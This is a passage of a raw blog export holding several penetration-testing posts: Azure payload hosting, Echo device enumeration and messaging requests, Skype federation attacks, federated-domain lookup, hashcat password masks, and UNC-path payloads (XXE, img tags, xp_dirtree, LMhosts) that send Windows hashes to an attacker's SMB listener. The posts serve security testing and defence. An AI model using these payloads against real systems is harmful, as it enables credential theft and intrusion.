I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.

If you need a primer, check out Microsoft’s documentation here - https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that's going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.

[post_title] => Utilizing Azure Services for Red Team Engagements [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => utiilzing-azure-for-red-team-engagements [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:53:42 [post_modified_gmt] => 2021-06-08 21:53:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8846 [menu_order] => 236 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 7688 [post_author] => 10 [post_date] => 2017-11-20 07:00:45 [post_date_gmt] => 2017-11-20 07:00:45 [post_content] => Amazon recently introduced messaging and calling between Echo devices. This allows Echo device owners to communicate to each other via text messages, audio recordings, and voice calls. It’s pretty handy for leaving someone a short note, or for a quick call, but as a hacker, I was more curious about the potential security issues associated with these new features. There have already been a couple of articles recently published that deal with some of the privacy concerns about the features, so we will be going deeper into the technical side of things for this post.

Enumerating Echoes

The “Amazon Alexa” mobile application can take in your phone's contact list and look up potential call contacts via their phone number. I was finding a surprising number of Echos in my contact list, so I figured the next step would be to try enumerating Echos that were not (yet) in my contact list. In order to do this, I needed to import new contacts into my phone with the phone numbers that I wanted to check for Echo devices. Creating the contacts was pretty simple using some Excel magic and the CSV contact import function in Gmail. So I fired up my throwaway Gmail account and added the entire 612-555-XXXX range (10,000 numbers) into my contacts list. For the privacy of the numbers listed below, I’ve changed the second set of numbers in the range to 555. To keep track of each number that I imported, I added the last name as “Test 1234”, where 1234 was the last four digits of the number that I was trying. Taking this route, I was able to identify 65 Echo devices in my phone number’s exchange range.

Contacts

Given that I was only able to find 65 Echo devices (of the more than 11 million sold), I guess that my number’s range isn’t very active. Google’s upper limit of contacts is 25,000 (Source), so I could potentially cover 2.5 ranges at once with one Gmail account. Given that there are 1,117 exchange ranges in the Minneapolis 612 area code (Source), it would take 447 rounds of this method to cover all of the 612 ranges. Alternatively, you could potentially add additional Google accounts to your phone and cut down the number of contact upload rounds. Please keep in mind that Amazon is monitoring for massive contact uploads, so don't try this at home. Side Note: For all of the following examples, I proxied the Alexa iOS application traffic through Burp Suite Professional, using an SSL certificate that was trusted by my device. Once an Echo device is added to your Amazon contact list, you will be able to see that the contact will have a specific Amazon ID tied to their account. These 28-character, alpha-numeric IDs are used with the APIs for interacting with other Echo devices. Here is one of the records that would be returned from my contacts list.
HTTP/1.1 200 OK
Server: Server
Date: Wed, 31 May 2017 23:12:58 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding,User-Agent
Content-Length: 63644

[{"name":{"firstName":"Karl","lastName":"Fosaaen"},"numbers":[{"number":"+1612[REDACTED]","type":"Mobile"}],"number":"+1612[REDACTED]","id":"bf[REDACTED]88","deviceContactId":null,"serverContactId":"bf[REDACTED]88","alexaEnabled":true,"isHomeGroup":false,"isBulkImport":false,"isBlocked":null,"sourceDeviceId":null,"sourceDeviceName":null,"commsId":["amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"],"commsIds":[{"aor":"sips:id.person.amzn1~amzn1.account.MY_AMAZON_ID@amcs-tachyon.com","id":"amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"}],"homeGroupId":null,"commsIdsPreferences":{"amzn1.comms.id.person.amzn1~amzn1.account. MY_AMAZON_ID":{"preferenceGrantedToContactByUser":{},"preferenceGrantedToUserByContact":{}}}},[Truncated]

Sending Text Messages

By proxying the iOS application traffic, we can also see the protocol used for creating text and audio messages. The protocol is pretty simple. Here’s the POST request that we would use to generate a new text message to the “THE_RECIPIENT_ID” user that we would have previously enumerated.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: [Truncated]
Content-Type: application/json
X-Amzn-RequestId: [Truncated]
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 170
Accept-Language: en-us

[{"payload":{"text":"Hey. This is Karl. I'm testing some Amazon stuff. I promise I won't spam you over this. "},"time":"2017-05-31T23:17:20.863Z","type":"message/text"}]

Sending Audio Messages

The audio side of things is a little different. First you have to upload your audio file (which you can overwrite with a proxy), then you send someone a link to the audio file. Here’s what the upload request and response would look like. HTTP POST Request:
POST /v1/media?include-transcript=true HTTP/1.1
Host: project-wink-mss-na.amazon.com
Accept: */*
Authorization: [Truncated]
Accept-Language: en-us
Content-Type: audio/aac
X-Authorization-Act-As: amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID
Content-Length: 39881
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Connection: close
X-Amzn-RequestId: 82DFDC97-65AE-4379-AE2D-77261AD13191
X-Total-Transfer-Length: 99150

[Truncated m4a audio file to be uploaded]
HTTP Server Response:
HTTP/1.1 201 Created
Server: Server
Date: Wed, 31 May 2017 23:26:01 GMT
Content-Type: application/json
Connection: close
Location: https://project-wink-mss-na.amazon.com/v1/media/arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT
Vary: Accept-Encoding,User-Agent
Content-Length: 170

{"id":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0. RD02REDACTEDCOT","transcript":null,"transcriptStatus":null}
The "id" above can then be used for an audio message, in a request that looks like this.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: DEF9FF9C-86EC-4C2E-BFFB-8C6D2A601D31
Content-Type: application/json
X-Amzn-RequestId: 9F4439B8-66FB-496B-820F-E7A96089F588
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 205
Accept-Language: en-us

[{"payload":{"mediaId":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT"},"time":"2017-05-31T22:50:06.005Z","type":"message/audio"}]
At this point, the audio message will be delivered to the recipient in the mobile app, or the Echo will let the recipient know there’s a new message.

Next Steps

So at this point, we’ve enumerated a city’s worth of Echo devices, figured out how to send text and audio messages to all of them, and we have a moral obligation to do the right thing. In the spirit of the last item, I've been in contact with the Amazon security team about this and they've been really great to work with on the disclosure process. They have already implemented some controls to prevent abuse with these features, and I'm looking forward to diving into the next set of features that they add to the Echo devices. [post_title] => Speaking to a City of Amazon Echoes [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => speaking-to-a-city-of-amazon-echoes [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:01 [post_modified_gmt] => 2021-06-08 21:52:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7688 [menu_order] => 254 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 6445 [post_author] => 10 [post_date] => 2016-07-21 07:00:21 [post_date_gmt] => 2016-07-21 07:00:21 [post_content] => Federated Skype for Business is a handy way to allow businesses to communicate with each other over a common instant messaging platform. From a security standpoint, the open exchange of information between businesses is a little concerning. NetSPI first started running into instances of federated Skype for Business (at that time Lync) about two years ago. We had opened up federation on our Skype setup and found that we could IM with some of our clients. We also found out that we could see their current availability. This was a little concerning to me at the time, but I was busy, so I didn’t look into it. I was finally able to really start digging into Skype federation last fall and it’s been a really interesting research subject.

The Basics

Skype federation works by setting up an internet facing federated endpoint to allow for outside domains to connect to and send messages through to another domain. Basically, Business A can talk to Business B, if both of them have the proper federation set up. There are a couple of ways that you can set up federation, but most of the domains that we’ve run into so far just have open federation enabled. You can restrict it by domain, but I have not seen this implemented as frequently. Being able to Skype chat with clients and other businesses could be handy, but what can we do with this as pen testers? For starters:
  • Validate email addresses
  • Get Skype availability and Out-of-Office statuses
  • Send phishing messages via Skype

Setting up Your Test Environment

Since you may not have federated Skype for Business (or Lync) at your disposal, and you probably don’t want to set up a server for yourself (I’ve heard it’s rough), you can just go to the cloud. This may sound like a plug for Microsoft services, but they are a reasonably priced option for testing this stuff out. You can go month to month ($6/month) or a full year ($5/month) and get federated Skype for Business services direct from Microsoft (See Here). It’s really easy to set up and if you only need it for an engagement, it’s pretty easy to fire up for a month. You will have to specifically enable domain federation through the web interface, but it’s pretty easy. Go to the Skype for Business admin center, select organization, and change the external access to “On except for blocked domains”. Also check the “public IM connectivity” button too. Once you have a federated Skype for Business domain set up, you just need the Skype for Business client (available on the Microsoft Office Portal) installed on your machine to start poking around. Let’s take a look at a sample domain. Here’s what we see when we try to communicate with an email address that is not federated with Skype.

We can see that the email address is listed in full and we get "Presence unknown" for the current status. Here’s what a live federated email address will look like. (Note the Full Name, Job Title, and Status)

Here’s what it looks like when I open up conversations with a bunch of CEOs from other federated companies. So we have a full name, job title, and current status. This is handy for one-off targeting of individuals, but what if we want to target a larger list. We can use the Lync SDK and some PowerShell to do that.

The Lync (Skype for Business) SDK

This can be kind of a pain to properly set up, so follow these steps. I know Visual Studio 2010 is old, but it’s the easiest way to get the Lync SDK to work. This should work. I’ve gone through this on a Windows 10 VM and had no issues. If you have issues with it, feel free to leave a comment. Once you have the SDK installed, we can start wrapping the SDK functions with PowerShell to automate our attacks. I’ve put together a few functions (outlined below) that we can use to start attacking these federated Skype for Business interfaces. Get the module here: https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1 All of these functions should be working, and there's a few more on the way (along with better documentation). Feel free to comment on the GitHub page with any feedback. If you have issues importing the Lync SDK DLL, do a search on your system for "Microsoft.Lync.Model.dll" and change your path in the module. If you followed the steps above, it should be in the default path.

Overview of Module Functions

Validate an email and get its status - Single Email
Get-SkypeStatus -email test@example.com

Email         : test@example.com
Title         : Chief Example Officer
Full Name     : Testing McTestface
Status        : Available
Out Of Office : False

*Side note - Since there is sometimes a federation delay, you may not get a user's status back immediately. It helps if you run the function a couple (2-3) of times. This can be done by using the "attempts" flag. You may end up with duplicates if you do multiple attempts, but you'll probably have better coverage.

Validate emails and get statuses - List Input
Get-SkypeStatus -inputFile C:Tempemails.txt | ft -auto

Email                       Title          Full Name   Status        Out Of Office
-----                       -----          ---------   ------        -------------
FakeName1@example.com      Consultant      FakeName 1  Away          False       
FakeName2@example.com      Accountant      FakeName 2  Away          False       
FakeName3@example.com      Intern          FakeName 3  Away          False       
FakeName4@example.com      Lead Intern     FakeName 4  Out of Office True        
FakeName5@example.com      Associate       FakeName 5  Available     False       
FakeName6@example.com      Somebody        FakeName 6  Offline       False       
FakeName7@example.com      Senior Somebody FakeName 7  Offline       False      
FakeName8@example.com      Marketing Guru  FakeName 8  Away          False       
FakeName9@example.com      IT “Engineer”   FakeName 9  Offline
Send a message - Single User
Invoke-SendSkypeMessage -email test@example.com -message "Hello World"
Sent the following message to test@example.com:
Hello World
Send a message - Multiple Users
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
Sent the following message to test@example.com:
Hello World

Sent the following message to test2@example.com:
Hello World
*If you don't feel like piping get-content, you can just use the "inputFile" parameter here as well. Start a group message
Invoke-SendGroupSkypeMessage -emails "test@example.com, test1@example.com" -message "testing"
Sent the following message to 2 users:
testing

*You can also use an input file here as well.

Send a million messages**
for ($i = 0; $i -lt 1000000; $i++){Invoke-SendSkypeMessage -email test@example.com -message "Hello $i"}
Sent the following message to test@example.com:
Hello 0
Sent the following message to test@example.com:
Hello 1
Sent the following message to test@example.com:
Hello 2
Sent the following message to test@example.com:
Hello 3
...
**For the record, Skype will probably not be happy with you if you try to open a million conversations. My Skype client starts crashing when it takes up around 1.5 gb of memory.

Current Exposure

So how big of an exposure is this? Since I see federation pretty regularly with our clients, I decided to go out and check the internet for other domains that support Skype federation. There are a couple of ways that we can identify potential federated Skype for Business domains. We’ll start with the Alexa top 1 million list and work down from there. We’ll start by seeing which domains have the ms=ms12345678 records. This is commonly placed in DNS TXT records so that Microsoft can validate the domain that is being federated.

47,455 of the top 1 million have “ms=ms*” records

Next we’ll take a look at how many of those "MS" domains have SIP or Microsoft federation specific SRV records enabled.

_sip._tcp.example.com -  9,395 Records

_sip._tls.example.com - 28,719 Records

_sipfederationtls._tcp.example.com - 28,537 Records

Taking a unique list of the domains from each of those lists, we end up with 29,551 domains. Now we can try to send messages to the “Administrator” (Default Domain Admin) Skype address.

45 Domains with the “Administrator” account registered on Skype for Business

I'm sure that there are plenty of domains in the list with renamed Administrator accounts and many others that also do not have a Skype user set up for that account, but this is still an interesting number of domain admins that are somewhat exposed.

Further Attacks

As you can see, there’s some decent surface area here to start attacking. My current favorite thing to send is UNC paths. Sending someone www.microsoftsupport.onlinehelp looks somewhat legitimate and happens to send a Skype user’s hash (if they click on it) directly to your attacking system (assuming you own microsoftsupport.online). Once you crack that hash, there's a good chance that the organization has auto-discovery set up for global Skype access. Just login to Skype for Business with your cracked credentials and start saying hello to your new co-workers. Some other options:
  • Want some extra time to run your attack, wait until the entire SOC team is “Away” or “In a Meeting” and fire away.
  • Need an audience? How about a group meeting with everyone (up to 250 users - source) in an organization at the same time?
  • Need to find an office to use for the day during onsite social engineering? Find the person who’s out of office for the day and set up shop in their spot.

Final Notes

For the defenders that are reading this, you should probably set up limitations on who you federate with. An overview of the different types of federation can be found here. Additionally, you may want to see if federation really makes sense for your organization. Sources Note: There is some really great prior work that was done by Jason Ostrom, Karl Feinauer, and William Borskey that they presented at DEF CON 20. Take a look at their talk on YouTube or their slides. [post_title] => Attacking Federated Skype for Business with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-federated-skype-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:29 [post_modified_gmt] => 2021-06-08 21:47:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6445 [menu_order] => 291 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 6298 [post_author] => 10 [post_date] => 2016-05-03 07:00:08 [post_date_gmt] => 2016-05-03 07:00:08 [post_content] => The Economy of Mechanism - Office365 SAML assertions vulnerability popped up on my radar this week and it’s been getting a lot of attention. The short version is that you could abuse the SAML authentication mechanisms for Office365 to access any federated domain.  It’s a really serious and interesting issue that you should totally read about, if you haven't already. I have a feeling that this will bring more attention to domain federation attacks and hopefully some new research into the area. Since I’m currently working on some ADFS research (and had this written), I figured now was a good time to release a simple PowerShell tool to enumerate ADFS endpoints using Microsoft’s own APIs. The SAML assertions blog post mentions using this same method to identify federated domains through Microsoft. I’ve wrapped it in PowerShell to make it a little more accessible. This tool should be handy for external pen testers that want to enumerate potential authentication points for federated domain accounts.

Office365 Authentication

If you are trying to authenticate to the Office365 website, Microsoft will do a lookup to see if your email account has authentication managed by Microsoft, or if it is tied to a specific federation server. This can be seen if you proxy your traffic while authenticating to the Office365 portal. Here’s an example request from the client with an email address to check.
GET /common/userrealm/?user=karl@example.com&api-version=2.1&checkForMicrosoftAccount=true HTTP/1.1
Host: login.microsoftonline.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
You will get one of two JSON responses back from Microsoft:
  1. A response for a federated domain server endpoint:
    {
      "MicrosoftAccount":1,
      "IsDomainVerified":0,
      "NameSpaceType":"Federated",
      "federation_protocol":"WSTrust",
      "Login":"karl@example.com",
      "AuthURL":"https://adfs.example.com/adfs/ls/?username=karl%40example.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=",
      "DomainName":"example.com",
      "FederationBrandName":"ExampleCompany"
    }
  2. A response for a domain managed by Microsoft:
    {
      MicrosoftAccount=1; 
      NameSpaceType=Managed; 
      Login=support@OtherExample.com; 
      DomainName=OtherExample.com; 
      FederationBrandName=Other Example; 
      TenantBrandingInfo=; 
      cloudinstancename=login.microsoftonline.com
    }

The PowerShell tool

To make this easier to parse, I wrote a PowerShell wrapper that makes the request out to Microsoft, parses the JSON response, and returns the information from Microsoft into a datatable. You can also use the -cmd flag to return a command that you can run to try and authenticate to either federated domain servers or to the Microsoft servers. Here’s a link to the code - https://github.com/NetSPI/PowerShell/blob/master/Get-FederationEndpoint.ps1 Here’s an example for each scenario:

Federated Endpoint:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Make sure you use the correct Username and Domain parameters when you try to authenticate!

Authentication Command:
Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://example.com/ -AppliesTo https://example.com/adfs/services/trust/13/usernamemixed -UserName 'test' -Password 'Summer2016' -Domain 'example.com' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors

Domain      Type      BrandName           AuthURL                                                                                                                                                     
------      ----      ---------           -------                                                                                                                                                     
example.com Federated Example Company LLC https://example.com/app/[Truncated]
If you're trying to authenticate with this command, it's important to note that this does require you to guess/know the domain username of the target (hence the warning). Frequently, we’ll see that the email address account name (ex. kfosaaen) does not line up with the domain account name (ex. a123456).

Microsoft Managed:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Domain is managed by Microsoft, try guessing creds this way:

    $msolcred = get-credential
    connect-msolservice -credential $msolcred

Domain      Type    BrandName AuthURL
------      ----    --------- -------
example.com Managed example    NA
If you get back the “managed” response from Microsoft, you can just use the Microsoft AzureAD tools to login (or attempt logins). Since this returns a datatable, it's easy to pipe in a list of emails to lookup federation information on. Get Content Pic *Screenshot Note - This was renamed from Get-ADFSEndpoint to Get-FederationEndpoint (10/06/16)

Prerequisites

Both of the authentication methods that the script returns are taken from Microsoft, and since I don’t own that code, I can’t redistribute it. But here’s some links to get the authentication tools from them. The code for Invoke-ADFSSecurityTokenRequest comes from this Microsoft post: The Microsoft managed authentication side (connect-msolservice) comes from the Azure AD PowerShell module. See Here: Finally, here’s a nice run down from Microsoft on how you can connect to any of the Microsoft online services with PowerShell:

Future Work

Taking this further, you could wrap both of these authentication functions to automate brute force password guessing attacks against accounts. Additionally, you could just use this script to enumerate the federation information for the Alexa top 1 million sites. Personally, I won’t be doing that, as I don’t want to send a million requests out to Microsoft. I actually have some other stuff in the works that is directly related to this, but it’s not quite ready to post yet. So keep an eye on the blog for more interesting ADFS attacks. [post_title] => Using PowerShell to Identify Federated Domains [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => using-powershell-identify-federated-domains [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:27 [post_modified_gmt] => 2021-06-08 21:47:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6298 [menu_order] => 293 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 5987 [post_author] => 10 [post_date] => 2016-01-19 07:00:33 [post_date_gmt] => 2016-01-19 07:00:33 [post_content] =>

Over the course of the last year, we’ve cracked a lot of NTLM domain password hashes. During many of our internal penetration tests, we grab the password hashes for all of the domain users and attempt to crack them. Throughout the year, we keep track of the hashes that we’ve cracked and try to gain some insight into how people are choosing passwords, and what we can do to identify some common weaknesses.

At the end of the last year, we took a look at the breakdown of lengths, common words, and number of duplicates. Since we captured more than double the number of hashes this year compared to 2014, it got to be a pain to track each and every domain hash cracking job.  Going forward, I’m looking to implement some better metrics in our cracking process to better tally these numbers and trends throughout the year.

I’ve compiled a list of our top password masks for the year. This was pretty easy to do, as we keep a running list of the cracked passwords for the year to reuse in other password cracking attempts. I have a handy Perl script  that I feed the cracked list into to determine the masks.

Below is the top 10 list of password masks for 2015’s cracked NTLM passwords.

The Top 10

#MaskExample Password% of Matching Cracked Passwords
1?u?l?l?l?l?l?d?dSpring155.45%
2?u?l?l?l?l?l?l?d?dJanuary154.14%
3?u?l?l?l?l?l?l?l?d?dDecember153.10%
4?u?l?l?l?d?d?d?dFall20152.91%
5?u?l?l?l?l?d?d?d?dMarch20152.79%
6?u?l?l?l?l?l?d?d?d?dWinter20152.72%
7?u?l?l?l?l?l?l?dJanuary12.34%
8?u?l?l?l?l?d?d?dMarch1231.98%
9?u?l?l?l?l?l?l?l?dFebruary11.72%
10?u?l?l?l?l?l?d?d?dAugust1231.51%

Legend
?u = Uppercase letter
?l = Lowercase letter
?d = Decimal number (0-9)

Given that we see some combination of month, day, season, and/or year in every domain that we encounter, I figured I would do all of our examples in that format. For what it’s worth, all of the example passwords here were found in the cracked list.

The top 10 patterns listed above account for 28.66% of the cracked password list.

The top 40 patterns (Download Links Below) for the year account for 50.83% of the passwords that we cracked for the year (not 50% of the hashes gathered for the year). Now please keep in mind that these are just for the cracked passwords. This is a uniqued list. It does not account for duplicates and that means it does not truly reflect the real mileage that you could get with using these on a typical domain. Running the top 10 masks against a recent domain dump allowed us to crack 29% of the hashes in seven and a half minutes. So this does give pretty decent coverage.

Hypothetically, if we cracked 80% of the unique hashes for the year, this list of 40 masks could crack about 40% of the unique domain passwords. Statistics are fun, but since I don’t have solid numbers for every NTLM domain hash that we attempted to crack this year, I can’t really give you this info.

Interesting things to note

  1. Not a single one of our top ten masks has a special character in it.
    1. We actually don’t hit a special character in a mask until #12 on the list. In fact, 63% of the passwords that were cracked did not contain a special character. This was only slightly surprising, as you can still have a password that hits (most) Windows GPO complexity requirements without having special characters.
  2. Of the top 40 patterns, all of the masks are between 8 and 12 characters.
    1. Again, not a big surprise as most domain password length requirements are set at 8 characters.
  3. People really like capitalized words for their passwords.
    1. Only four of the top 40 masks don’t follow a dictionary word appended with something. I’d like to say that this is just skewed based off our cracking methodology, but most of the passwords that we’re running into contain a dictionary word .

So what do I do with these?

OCLHashcat has support for these mask files. Just use the attack mode 3 (brute force) option and provide the list of masks to use in a text file.
./oclHashcat64.bin -m 1000 hashes.txt -o output.txt -a 3 2015-Top40-Time-Sort.hcmask

When should I use these?

Personally, I would use these after I’ve gone through some dictionaries and rules. Since this is a brute force attack (on a limited key-space) this is not always as efficient as the dictionary and rule-based attacks. However, I have found that this works well for passwords that are not using dictionary words. For example, a dictionary and rule would catch Spring15, but it would be less likely to catch Gralwu94. However, Gralwu94 would be caught by a mask attack in this situation.

How long would this take?

That depends. We have a couple of GPU cracking boxes that we can distribute this against, but if we just ran it on our main cracking system, it would take about three and a half days to complete. That’s a really long time. There’s a few weird ones in the list that were easy to crack with word lists and rules (resulting in lots of mask hits), but they take a long time to brute force the key space (?u?l?l?l?l?l?l?l?l?l?d?d - Springtime15). I went through and time stamped each of the top 40 and created a time sorted list that you can quit using when you start hitting your own time limits.

2015 - Top 40 Masks List

2015 - Time Sorted Top 40 Masks List

[post_title] => NetSPI’s Top Password Masks for 2015 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-password-masks-for-2015 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:51 [post_modified_gmt] => 2021-04-13 00:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5987 [menu_order] => 303 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 4496 [post_author] => 10 [post_date] => 2015-07-22 07:00:36 [post_date_gmt] => 2015-07-22 07:00:36 [post_content] => Recently there was a big fuss over the “Redirect to SMB” blog that was put out by Brian Wallace. Personally, I think that the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here’s a bunch of other ways that you can force a UNC path and capture credentials. UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: Capture and Crack the hash or Relay the hash on to another computer. Plenty has been written about both options, so we won’t cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules and file restrictions can really mess up some of these, so your mileage may vary. For demo purposes, we will be using "192.168.1.123test" as our listening UNC path / SMB server. Here's a linked table, if you want to directly jump to one of these: Honorable Mention:

1. XML External Entity Injection

External entity injection can be a very handy way to read files off of a remote system, but if that server happens to be a Windows system, you can utilize a UNC path.
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]>
<foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.

2. Broken IMG Tags

Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there’s a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.). “Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer.” (Source)
<img src=192.168.1.123test.gif>

3. Directory Traversals

I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical .... or C: directory traversal),  you may be able to capture the credentials for the service account that runs the web application. Change the Id parameter in this URL:
  • http://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf
To this:
  • http://test.example.com/Print/FileReader.aspx?Id=192.168.1.123test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote about using built-in SQL server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the “domain users” group to authenticate. It’s surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server.
xp_dirtree '192.168.1.123'
xp_fileexist '192.168.1.123'
There’s a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Anytime you can read a file in SQL, you can probably use a UNC path in it. This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it and there's a great blog about Oracle SMB relay on the ERPScan blog.

5. File Shares

If you have write access to a file share, you have a couple of options for getting hashes.
  1. Here’s a great one from Mubix - Modify the path for the icons for .lnk shortcut links to a UNC path
  2. Microsoft Word documents can also be modded with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC pathes into the documents.

6. Drive Mapping on Login

This may be overkill, but it could be handy for persistence. By modding any scripts used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy as any users who have this drive added will send you credentials every time they log in. If you don't have rights to overwrite the start up scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the start up script server.

7. Thick Applications

Basically anywhere that you can tell an app to load a file, you potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog. Bfe B Ec Db Ebff Ce Ec

8. The LMhosts.sam file

Mubix has a couple of great UNC tricks in his “AT is the new black” presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. Here's a sample LMhosts.sam using our UNC path:
192.168.1.123    netspi #PRE
#BEGIN_ALTERNATE
#INCLUDE netspitesthosts.txt
#END_ALTERNATE

9. SharePoint

On many of our pen tests, we get access to accounts that can edit everybody’s favorite intranet site, SharePoint. Using any of the other listed methods, you should be able to drop files or direct UNC links on the SharePoint site. Just make sure you go back and clean up the page(s) when you’re done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you can do with Ettercap filters. One of those things is overwriting content with UNC paths. By injecting a UNC path into someone’s HTML document, clear text SQL query, or any of the protocols mentioned above you should be able to get them to authenticate back to your attacking machine.

Honorable Mention:

11. Redirect to SMB

For what it’s worth, this issue has been out for a very long time. Basically, you get your victim to visit your malicious HTTP server and you 302 redirect them to a UNC file location. If the browser (or program making the HTTP request) automatically authenticates, then the victim will send their hash over to the UNC location. Some of the methods above (See XXE) allow for this if you use an HTTP path instead of the UNC path.

Conclusion

